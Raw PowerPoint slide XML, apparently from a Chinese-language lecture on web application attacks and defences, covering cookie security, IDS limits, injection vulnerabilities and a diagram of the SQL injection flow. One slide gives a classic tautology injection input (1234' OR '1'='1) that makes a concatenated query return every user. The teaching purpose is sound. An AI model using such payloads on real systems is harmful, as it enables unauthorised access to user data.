          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2004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6522" y="1429471"/>
            <a:ext cx="7772400" cy="4694237"/>
          </a:xfrm>
        </p:spPr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判定注册用户是否已经登录网站，用户可能会得到提示</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>购物车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安全问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38623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2977" y="1101725"/>
            <a:ext cx="7772400" cy="4694237"/>
          </a:xfrm>
        </p:spPr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的生成与维护</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>在生成时就会被指定一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Expire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>值，这就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>的生存周期</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>。到期自动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>清除。如果没有指定则表示浏览器关闭为止</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>如果一台计算机上安装了多个浏览器，每个浏览器都会在各自独立的空间存放</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>同一</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>台计算机同一浏览器的不同用户的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也是独立的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>中的内容大多数经过了编码处理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安全问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22600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177091"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的一般格式如下：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>NAME= VALUE; expires= DATE; path= PATH;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domain= DOMAIN_NAME; secure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autolog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> = bWlrzTpteXMxy3IzdA%3D%3D; expires=Sat, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>01-Jan-2022 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>00:00:00 GMT; path=/; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>domain=victim.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>如果不指定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属性，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只被发送给生成它的服务器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安全问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30277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zh-CN" dirty="0"/>
              <a:t>中包含了一些敏感信息，如用户名、计算机名、使用的浏览器和曾经访问的网站等，攻击者可以利用它来进行窃密和欺骗攻击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安全问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24265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Line 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm flipV="1">
            <a:off x="1553830" y="4011796"/>
            <a:ext cx="6253738" cy="31621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7671" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm rot="3419336">
            <a:off x="1261728" y="1900301"/>
            <a:ext cx="479425" cy="520700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699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7672" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1338692" y="1939988"/>
            <a:ext cx="30168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777673" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm flipV="1">
            <a:off x="1536366" y="2482360"/>
            <a:ext cx="6253738" cy="24365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7674" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2104691" y="1851715"/>
            <a:ext cx="568541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defRPr kumimoji="0" sz="320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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用体系结构脆弱性分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1777675" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2122155" y="3421583"/>
            <a:ext cx="5702877" cy="5847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defRPr kumimoji="0" sz="3200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18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常见</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用攻击及防范</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1777676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内容提纲</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1777679" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm rot="3419336">
            <a:off x="1279192" y="3448105"/>
            <a:ext cx="479425" cy="520700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9369E7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369E7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7680" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1356156" y="3468742"/>
            <a:ext cx="30168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 rot="3419336">
            <a:off x="1242678" y="5134070"/>
            <a:ext cx="479425" cy="520700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699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gray">
          <a:xfrm>
            <a:off x="2122155" y="5157837"/>
            <a:ext cx="568541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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0"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应用防火墙</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN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WAF</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="32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gray">
          <a:xfrm>
            <a:off x="1346628" y="5165820"/>
            <a:ext cx="301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gray">
          <a:xfrm flipV="1">
            <a:off x="1522078" y="5673819"/>
            <a:ext cx="6268026" cy="460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672312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22135" y="2946224"/>
            <a:ext cx="5812325" cy="5866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一、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注入攻击及防范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C183C6B-4CE8-4A40-AC73-3C755695364D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322563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隐秘攻击技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="620547" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1484313"/>
            <a:ext cx="777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IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>技术的出现和进步，使得系统攻击的难度大大提高，一个系统安装了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>，入门级的攻击者几乎不可能成功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简单攻击在网络上占据了相当大的比例，所以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>在实际应用中取得了很好的效果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面对有经验的攻击者，以及拥有充足资源的敌对组织的攻击，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>技术仍不令人满意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IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>对于已知的具有明显特征的攻击手段检测效果很好，特别是对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>攻击和扫描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即使最好的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>，对于一些新的攻击手段包括隐秘攻击的检测率都很低</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39867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注入漏洞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229600" cy="2646363"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>最普遍的注入漏洞包括：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注入：通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句恶意地调用后台数据库</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统调用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shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令调用外部程序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty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062673" y="4717415"/>
            <a:ext cx="6624637" cy="9461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任何依赖于解释执行的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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sz="28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应用都有被注入漏洞攻击的危险！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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应用程序对特殊字符串过滤不完全的缺陷</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>大多数的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入攻击发生在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应用程序使用用户提供的输入内容来拼接动态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语句以访问数据库时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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34747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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入原理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1225"/>
            <a:ext cx="8686800" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>例子：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>通过用户提供的参数来查询表中的数据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"SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>* FROM USERS WHERE SSN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>=‘" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> + "’“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SSN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>参数来自于用户的输入：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>参数未经验证或编码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>黑客输入： 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1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>’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 OR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>‘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en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>’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FF3300"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>‘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1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>应用程序构造查询语句：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SELECT * FROM USERS WHERE SSN=‘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1234’ OR ‘1’=‘1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>结果返回数据库中的每一个用户</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436228" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6765925" y="3052763"/>
            <a:ext cx="1582738" cy="719137"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -244483"/>
              <a:gd name="adj2" fmla="val 159713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2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>永真逻辑！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endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1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5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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入攻击流程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/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228600" y="914400"/>
            <a:ext cx="5715000" cy="25796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hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="9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 flipH="1">
            <a:off x="4495800" y="2943225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228600" y="3668713"/>
            <a:ext cx="5715000" cy="25796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hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc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>
            <a:off x="765175" y="5057775"/>
            <a:ext cx="109061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1009650" y="3001963"/>
            <a:ext cx="1588" cy="20558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57" name="AutoShape 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-318816">
            <a:off x="1311275" y="4887913"/>
            <a:ext cx="139700" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 56324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58" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1330325" y="4946650"/>
            <a:ext cx="4921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59" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1379538" y="4946650"/>
            <a:ext cx="5080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60" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="889000" y="5230813"/>
            <a:ext cx="1631950" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC33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itchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Firewall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437261" name="AutoShape 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1609725" y="4935538"/>
            <a:ext cx="668337" cy="153988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62" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1968500" y="5043488"/>
            <a:ext cx="2063750" cy="14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63" name="Freeform 15"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1073150" y="2979738"/>
            <a:ext cx="511175" cy="1927225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68" y="775"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="479" y="980"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="479" h="980">
                <a:moveTo>
                  <a:pt x="68" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="33" y="304"/>
                  <a:pt x="0" y="612"/>
                  <a:pt x="68" y="775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="136" y="938"/>
                  <a:pt x="393" y="937"/>
                  <a:pt x="479" y="980"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="101600" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="6000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>
            <a:off x="2989263" y="4414838"/>
            <a:ext cx="0" cy="601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65" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2801938" y="43561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66" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="2368550" y="4489450"/>
            <a:ext cx="1227138" cy="268288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC33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itchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Hardened OS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ltGray">
          <a:xfrm>
            <a:off x="2354263" y="4156075"/>
            <a:ext cx="1228725" cy="268288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC33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itchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Web Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437268" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="2354263" y="3813175"/>
            <a:ext cx="1228725" cy="268288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC33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itchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>App Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437269" name="AutoShape 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2801938" y="3554413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 flipH="1">
            <a:off x="2995613" y="3233738"/>
            <a:ext cx="1587" cy="38893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ltGray">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3292475" y="5203825"/>
            <a:ext cx="1631950" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC33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itchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Firewall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437272" name="AutoShape 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4012407" y="4933156"/>
            <a:ext cx="666750" cy="150813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73" name="Line 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4362450" y="5053013"/>
            <a:ext cx="1033463" cy="15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ltGray">
          <a:xfrm rot="16200000">
            <a:off x="3846513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Databases</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
